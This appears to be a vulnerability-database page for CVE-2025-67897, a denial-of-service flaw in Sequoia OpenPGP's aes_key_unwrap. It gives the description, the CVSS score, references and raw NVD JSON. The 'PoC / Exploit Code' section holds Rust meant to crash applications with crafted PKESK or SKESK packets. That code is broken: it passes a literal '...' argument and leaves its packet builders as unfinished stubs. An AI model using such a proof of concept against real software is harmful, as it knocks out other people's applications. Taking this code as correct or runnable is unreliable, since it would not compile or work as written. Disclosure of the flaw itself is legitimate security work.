Security Vulnerability Report
CVE-2025-67897 CVSS 5.3 MEDIUM

Published: 2025-12-14 05:16:06
Last Modified: 2026-04-15 00:35:42

Description

In Sequoia before 2.1.0, aes_key_unwrap panics if passed a ciphertext that is too short. A remote attacker can take advantage of this issue to crash an application by sending a victim an encrypted message with a crafted PKESK or SKESK packet.

CVSS Details

CVSS Score: 5.3
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:N/A:H

Configurations (Affected Products)

No configuration data available.

Sequoia OpenPGP < 2.1.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
rust
// CVE-2025-67897 PoC - Sequoia aes_key_unwrap DoS
// This PoC demonstrates triggering panic via short ciphertext
use sequoia_openpgp::{Packet, PacketPile, parse::Parse};
use sequoia_openpgp::policy::StandardPolicy;

fn main() {
    // Create a crafted OpenPGP message with short ciphertext
    // that will trigger panic in aes_key_unwrap
    let policy = &StandardPolicy::new();

    // Malicious PKESK packet with too short ciphertext
    let malicious_pkesk = create_short_ciphertext_pkesk();

    // Attempt to parse and decrypt
    // (PacketPile is parsed from bytes through the Parse trait)
    let packets = PacketPile::from_bytes(&malicious_pkesk[..]);
    match packets {
        Ok(pile) => {
            // This will trigger panic when processing
            for packet in pile.descendants() {
                if let Ok(_decrypted) = packet.decrypt(policy, ...) {
                    // Processing continues
                }
            }
        },
        Err(e) => println!("Parse error: {}", e),
    }
}

fn create_short_ciphertext_pkesk() -> Vec<u8> {
    // Construct PKESK with ciphertext shorter than expected (e.g., 7 bytes)
    // Normal ciphertext should be multiple of 8 bytes, minimum 16 bytes
    let short_ciphertext = vec![0u8; 7]; // Too short!

    // Build PKESK packet structure
    let mut pkesk = Vec::new();
    pkesk.push(0x84); // PKESK version 3 tag
    // ... add key ID, algorithm, and short_ciphertext
    pkesk
}

// Alternative: Craft SKESK with insufficient ciphertext length
fn create_short_ciphertext_skesk() -> Vec<u8> {
    let short_ciphertext = vec![0u8; 3]; // Insufficient length

    // Build SKESK packet with short ciphertext to trigger panic
    let mut skesk = Vec::new();
    skesk.push(0x04); // SKESK version 4
    // ... add ESK with short ciphertext
    skesk
}

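References

https://bugs.debian.org/1122582
https://gitlab.com/sequoia-pgp/sequoia/-/blob/b59886e5e7bdf7169ed330f309a6633d131776e5/openpgp/NEWS#L7-L26
https://gitlab.com/sequoia-pgp/sequoia/-/commit/b59886e5e7bdf7169ed330f309a6633d131776e5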

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-67897", "sourceIdentifier": "[email protected]", "published": "2025-12-14T05:16:06.453", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "In Sequoia before 2.1.0, aes_key_unwrap panics if passed a ciphertext that is too short. A remote attacker can take advantage of this issue to crash an application by sending a victim an encrypted message with a crafted PKESK or SKESK packet."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:N/A:H", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.6, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-195"}]}], "references": [{"url": "https://bugs.debian.org/1122582", "source": "[email protected]"}, {"url": "https://gitlab.com/sequoia-pgp/sequoia/-/blob/b59886e5e7bdf7169ed330f309a6633d131776e5/openpgp/NEWS#L7-L26", "source": "[email protected]"}, {"url": "https://gitlab.com/sequoia-pgp/sequoia/-/commit/b59886e5e7bdf7169ed330f309a6633d131776e5", "source": "[email protected]"}]}}